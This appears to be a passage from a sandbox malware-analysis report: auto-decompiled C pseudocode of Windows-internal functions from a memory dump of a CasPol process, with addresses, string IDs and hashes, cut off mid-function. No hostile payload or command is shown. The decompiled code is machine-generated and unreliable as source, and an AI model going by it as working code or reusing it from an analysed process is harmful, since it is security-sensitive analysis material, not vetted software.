                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017A3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                			E017A3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x181d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01760BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					L017A3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0176FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E017A3540;
						E0176FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						L0177DDD0( &_v1072, _t75, _t79, _t80, _t81);
						L017B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						L017697C0();
					}
					return L0176B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E017A3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E017A3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0176FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = L01769650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							L017A3787(_a4,  &_v352, _t80);
						}
					}
					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E017695D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                                                                                                                                                                                                                0x017a3552
                                                                                                                                                                                                                                                                                                0x017a355a
                                                                                                                                                                                                                                                                                                0x017a355d
                                                                                                                                                                                                                                                                                                0x017a3566
                                                                                                                                                                                                                                                                                                0x017a3567
                                                                                                                                                                                                                                                                                                0x017a357e
                                                                                                                                                                                                                                                                                                0x017a358f
                                                                                                                                                                                                                                                                                                0x017a35a1
                                                                                                                                                                                                                                                                                                0x017a35a5
                                                                                                                                                                                                                                                                                                0x017a366b
                                                                                                                                                                                                                                                                                                0x017a366b
                                                                                                                                                                                                                                                                                                0x017a366d
                                                                                                                                                                                                                                                                                                0x017a3672
                                                                                                                                                                                                                                                                                                0x017a3679
                                                                                                                                                                                                                                                                                                0x017a3685
                                                                                                                                                                                                                                                                                                0x017a368d
                                                                                                                                                                                                                                                                                                0x017a369d
                                                                                                                                                                                                                                                                                                0x017a36a7
                                                                                                                                                                                                                                                                                                0x017a36b8
                                                                                                                                                                                                                                                                                                0x017a36c6
                                                                                                                                                                                                                                                                                                0x017a36c7
                                                                                                                                                                                                                                                                                                0x017a36dc
                                                                                                                                                                                                                                                                                                0x017a36e1
                                                                                                                                                                                                                                                                                                0x017a36e7
                                                                                                                                                                                                                                                                                                0x017a36e9
                                                                                                                                                                                                                                                                                                0x017a36e9
                                                                                                                                                                                                                                                                                                0x017a3703
                                                                                                                                                                                                                                                                                                0x017a3703
                                                                                                                                                                                                                                                                                                0x017a35b5
                                                                                                                                                                                                                                                                                                0x017a35c0
                                                                                                                                                                                                                                                                                                0x017a35c4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a35ca
                                                                                                                                                                                                                                                                                                0x017a35d7
                                                                                                                                                                                                                                                                                                0x017a35e2
                                                                                                                                                                                                                                                                                                0x017a35e6
                                                                                                                                                                                                                                                                                                0x017a35e8
                                                                                                                                                                                                                                                                                                0x017a35f5
                                                                                                                                                                                                                                                                                                0x017a35fa
                                                                                                                                                                                                                                                                                                0x017a3603
                                                                                                                                                                                                                                                                                                0x017a3604
                                                                                                                                                                                                                                                                                                0x017a3609
                                                                                                                                                                                                                                                                                                0x017a360a
                                                                                                                                                                                                                                                                                                0x017a3612
                                                                                                                                                                                                                                                                                                0x017a3613
                                                                                                                                                                                                                                                                                                0x017a361e
                                                                                                                                                                                                                                                                                                0x017a3622
                                                                                                                                                                                                                                                                                                0x017a3628
                                                                                                                                                                                                                                                                                                0x017a362f
                                                                                                                                                                                                                                                                                                0x017a362f
                                                                                                                                                                                                                                                                                                0x017a3636
                                                                                                                                                                                                                                                                                                0x017a3638
                                                                                                                                                                                                                                                                                                0x017a363b
                                                                                                                                                                                                                                                                                                0x017a3642
                                                                                                                                                                                                                                                                                                0x017a3642
                                                                                                                                                                                                                                                                                                0x017a3636
                                                                                                                                                                                                                                                                                                0x017a3657
                                                                                                                                                                                                                                                                                                0x017a3657
                                                                                                                                                                                                                                                                                                0x017a365c
                                                                                                                                                                                                                                                                                                0x017a3662
                                                                                                                                                                                                                                                                                                0x017a3669
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: BinaryHash
                                                                                                                                                                                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                                                                                                                                                                                • Opcode ID: faa5a16faaeb684a8c6c1efcd7e896abf20b51b697e16a552a63180736c605a4
                                                                                                                                                                                                                                                                                                • Instruction ID: ae8190f2150caf97fa9b5e75254c166644f16a373bca5a5cba4de4491294d8e0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: faa5a16faaeb684a8c6c1efcd7e896abf20b51b697e16a552a63180736c605a4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F34122B2D0052DABDB21DE50CC85FEEF77CAB54714F5046A5EB09AB240DB309E888F95
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017A3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                                                                			E017A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = L01769650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01744620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = L01769650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                                                                                                                                                                                                                0x017a3893
                                                                                                                                                                                                                                                                                                0x017a3896
                                                                                                                                                                                                                                                                                                0x017a3899
                                                                                                                                                                                                                                                                                                0x017a389f
                                                                                                                                                                                                                                                                                                0x017a38a0
                                                                                                                                                                                                                                                                                                0x017a38a4
                                                                                                                                                                                                                                                                                                0x017a38a9
                                                                                                                                                                                                                                                                                                0x017a38ac
                                                                                                                                                                                                                                                                                                0x017a38ad
                                                                                                                                                                                                                                                                                                0x017a38ae
                                                                                                                                                                                                                                                                                                0x017a38af
                                                                                                                                                                                                                                                                                                0x017a38b1
                                                                                                                                                                                                                                                                                                0x017a38b4
                                                                                                                                                                                                                                                                                                0x017a38bb
                                                                                                                                                                                                                                                                                                0x017a38bc
                                                                                                                                                                                                                                                                                                0x017a38bd
                                                                                                                                                                                                                                                                                                0x017a38c4
                                                                                                                                                                                                                                                                                                0x017a38c8
                                                                                                                                                                                                                                                                                                0x017a38ca
                                                                                                                                                                                                                                                                                                0x017a38ca
                                                                                                                                                                                                                                                                                                0x017a38d5
                                                                                                                                                                                                                                                                                                0x017a393e
                                                                                                                                                                                                                                                                                                0x017a3940
                                                                                                                                                                                                                                                                                                0x017a3942
                                                                                                                                                                                                                                                                                                0x017a3952
                                                                                                                                                                                                                                                                                                0x017a3954
                                                                                                                                                                                                                                                                                                0x017a3961
                                                                                                                                                                                                                                                                                                0x017a3961
                                                                                                                                                                                                                                                                                                0x017a3967
                                                                                                                                                                                                                                                                                                0x017a396e
                                                                                                                                                                                                                                                                                                0x017a396e
                                                                                                                                                                                                                                                                                                0x017a3947
                                                                                                                                                                                                                                                                                                0x017a394c
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a394c
                                                                                                                                                                                                                                                                                                0x017a38ea
                                                                                                                                                                                                                                                                                                0x017a38ee
                                                                                                                                                                                                                                                                                                0x017a38f8
                                                                                                                                                                                                                                                                                                0x017a38f9
                                                                                                                                                                                                                                                                                                0x017a38ff
                                                                                                                                                                                                                                                                                                0x017a3900
                                                                                                                                                                                                                                                                                                0x017a3902
                                                                                                                                                                                                                                                                                                0x017a3903
                                                                                                                                                                                                                                                                                                0x017a390b
                                                                                                                                                                                                                                                                                                0x017a390f
                                                                                                                                                                                                                                                                                                0x017a3950
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a3950
                                                                                                                                                                                                                                                                                                0x017a3915
                                                                                                                                                                                                                                                                                                0x017a391d
                                                                                                                                                                                                                                                                                                0x017a391d
                                                                                                                                                                                                                                                                                                0x017a3922
                                                                                                                                                                                                                                                                                                0x017a3926
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a3928
                                                                                                                                                                                                                                                                                                0x017a392b
                                                                                                                                                                                                                                                                                                0x017a392b
                                                                                                                                                                                                                                                                                                0x017a3935
                                                                                                                                                                                                                                                                                                0x017a3937
                                                                                                                                                                                                                                                                                                0x017a3937
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a3935
                                                                                                                                                                                                                                                                                                0x017a3926
                                                                                                                                                                                                                                                                                                0x017a38f0
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: BinaryName
                                                                                                                                                                                                                                                                                                • API String ID: 0-215506332
                                                                                                                                                                                                                                                                                                • Opcode ID: f1d49c8e4054a5e93462175e9fb768941830edc43daeb81b6cd8699c7f4f153c
                                                                                                                                                                                                                                                                                                • Instruction ID: ff5c0280cf4c4ef7056b4e6361770a068e088ed3323ac48ae26c112b272c7cc5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1d49c8e4054a5e93462175e9fb768941830edc43daeb81b6cd8699c7f4f153c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D31E33290061ABFEB16DE58C945E6BFB74FB80B28F514269EA15A7290D7309E04C7A1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0175D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 33%
                                                                                                                                                                                                                                                                                                			E0175D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x181d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01744120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return L0176B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E017698D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E017695D0();
					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                                                                                                                                                                                                0x0175d29c
                                                                                                                                                                                                                                                                                                0x0175d2a6
                                                                                                                                                                                                                                                                                                0x0175d2b1
                                                                                                                                                                                                                                                                                                0x0175d2b5
                                                                                                                                                                                                                                                                                                0x0175d2b6
                                                                                                                                                                                                                                                                                                0x0175d2bc
                                                                                                                                                                                                                                                                                                0x0175d2bd
                                                                                                                                                                                                                                                                                                0x0175d2be
                                                                                                                                                                                                                                                                                                0x0175d2bf
                                                                                                                                                                                                                                                                                                0x0175d2c2
                                                                                                                                                                                                                                                                                                0x0175d2c4
                                                                                                                                                                                                                                                                                                0x0175d2cc
                                                                                                                                                                                                                                                                                                0x0175d384
                                                                                                                                                                                                                                                                                                0x0175d34b
                                                                                                                                                                                                                                                                                                0x0175d34f
                                                                                                                                                                                                                                                                                                0x0175d350
                                                                                                                                                                                                                                                                                                0x0175d351
                                                                                                                                                                                                                                                                                                0x0175d35c
                                                                                                                                                                                                                                                                                                0x0175d35c
                                                                                                                                                                                                                                                                                                0x0175d2d6
                                                                                                                                                                                                                                                                                                0x0175d2da
                                                                                                                                                                                                                                                                                                0x0175d2e1
                                                                                                                                                                                                                                                                                                0x0175d361
                                                                                                                                                                                                                                                                                                0x0175d369
                                                                                                                                                                                                                                                                                                0x0175d36d
                                                                                                                                                                                                                                                                                                0x0175d2e3
                                                                                                                                                                                                                                                                                                0x0175d2e3
                                                                                                                                                                                                                                                                                                0x0175d2e3
                                                                                                                                                                                                                                                                                                0x0175d2e5
                                                                                                                                                                                                                                                                                                0x0175d2ed
                                                                                                                                                                                                                                                                                                0x0175d2f5
                                                                                                                                                                                                                                                                                                0x0175d2fa
                                                                                                                                                                                                                                                                                                0x0175d302
                                                                                                                                                                                                                                                                                                0x0175d303
                                                                                                                                                                                                                                                                                                0x0175d30b
                                                                                                                                                                                                                                                                                                0x0175d30f
                                                                                                                                                                                                                                                                                                0x0175d313
                                                                                                                                                                                                                                                                                                0x0175d318
                                                                                                                                                                                                                                                                                                0x0175d31c
                                                                                                                                                                                                                                                                                                0x0175d320
                                                                                                                                                                                                                                                                                                0x0175d379
                                                                                                                                                                                                                                                                                                0x0175d37d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179affe
                                                                                                                                                                                                                                                                                                0x0179b001
                                                                                                                                                                                                                                                                                                0x0179b011
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175d322
                                                                                                                                                                                                                                                                                                0x0175d322
                                                                                                                                                                                                                                                                                                0x0175d330
                                                                                                                                                                                                                                                                                                0x0175d337
                                                                                                                                                                                                                                                                                                0x0175d35d
                                                                                                                                                                                                                                                                                                0x0175d339
                                                                                                                                                                                                                                                                                                0x0175d33f
                                                                                                                                                                                                                                                                                                0x0175d38c
                                                                                                                                                                                                                                                                                                0x0175d38c
                                                                                                                                                                                                                                                                                                0x0175d33f
                                                                                                                                                                                                                                                                                                0x0175d349
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175d349

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                                • Opcode ID: fb94343a18e794fd4a6673f43c93d1e8345fcf375884dc2acba68bf4fec3c054
                                                                                                                                                                                                                                                                                                • Instruction ID: aa908d805bf428e61c0bb9e9316c3651895ab00387a780d1edd7c45b783fb51f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb94343a18e794fd4a6673f43c93d1e8345fcf375884dc2acba68bf4fec3c054
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3331DFB2509301DFD361DF68C884A6BFBE8EB89654F00092EFD9483211E774DD08CB92
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01731B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                                                                			E01731B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0176BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0176A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0176A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01744620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                                                                                                                                                                                                                0x01731b8f
                                                                                                                                                                                                                                                                                                0x01731b9a
                                                                                                                                                                                                                                                                                                0x01731b9c
                                                                                                                                                                                                                                                                                                0x01731b9e
                                                                                                                                                                                                                                                                                                0x01731ba3
                                                                                                                                                                                                                                                                                                0x01787010
                                                                                                                                                                                                                                                                                                0x01787010
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01731ba9
                                                                                                                                                                                                                                                                                                0x01731ba9
                                                                                                                                                                                                                                                                                                0x01731bae
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01731bc5
                                                                                                                                                                                                                                                                                                0x01731bca
                                                                                                                                                                                                                                                                                                0x01731bcf
                                                                                                                                                                                                                                                                                                0x01731bd0
                                                                                                                                                                                                                                                                                                0x01731bd1
                                                                                                                                                                                                                                                                                                0x01731bd2
                                                                                                                                                                                                                                                                                                0x01731bd6
                                                                                                                                                                                                                                                                                                0x01731bdc
                                                                                                                                                                                                                                                                                                0x01731be0
                                                                                                                                                                                                                                                                                                0x01786ffc
                                                                                                                                                                                                                                                                                                0x01787000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01787006
                                                                                                                                                                                                                                                                                                0x01787009
                                                                                                                                                                                                                                                                                                0x01787009
                                                                                                                                                                                                                                                                                                0x01731be6
                                                                                                                                                                                                                                                                                                0x01731bec
                                                                                                                                                                                                                                                                                                0x01731c0b
                                                                                                                                                                                                                                                                                                0x01731c0b
                                                                                                                                                                                                                                                                                                0x01731c0c
                                                                                                                                                                                                                                                                                                0x01731c11
                                                                                                                                                                                                                                                                                                0x01731c12
                                                                                                                                                                                                                                                                                                0x01731c15
                                                                                                                                                                                                                                                                                                0x01731c1b
                                                                                                                                                                                                                                                                                                0x01731c1f
                                                                                                                                                                                                                                                                                                0x01731c31
                                                                                                                                                                                                                                                                                                0x01731c33
                                                                                                                                                                                                                                                                                                0x01787026
                                                                                                                                                                                                                                                                                                0x01787026
                                                                                                                                                                                                                                                                                                0x01731c21
                                                                                                                                                                                                                                                                                                0x01731c24
                                                                                                                                                                                                                                                                                                0x01731c24
                                                                                                                                                                                                                                                                                                0x01731bee
                                                                                                                                                                                                                                                                                                0x01731bee
                                                                                                                                                                                                                                                                                                0x01731bf2
                                                                                                                                                                                                                                                                                                0x01731c3a
                                                                                                                                                                                                                                                                                                0x01731bf4
                                                                                                                                                                                                                                                                                                0x01731bf4
                                                                                                                                                                                                                                                                                                0x01731c05
                                                                                                                                                                                                                                                                                                0x01731c05
                                                                                                                                                                                                                                                                                                0x01731c09
                                                                                                                                                                                                                                                                                                0x01731c3e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01731c09
                                                                                                                                                                                                                                                                                                0x01731bec
                                                                                                                                                                                                                                                                                                0x01731be0
                                                                                                                                                                                                                                                                                                0x01731bae
                                                                                                                                                                                                                                                                                                0x01731c2e

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: WindowsExcludedProcs
                                                                                                                                                                                                                                                                                                • API String ID: 0-3583428290
                                                                                                                                                                                                                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                                                                                                                                                                                • Instruction ID: 59aabd1df67ecbead24e52c76e32d320e6d1c169c83aa42d7d92db7bdcd86988
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3221493B500228ABDF22AA59C844F5BFBACEFC0610F250461FE05DB201D634DC01D7B0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017F5BA5 Relevance: .6, Instructions: 592COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                                			E017F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1801178);
				E0177D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
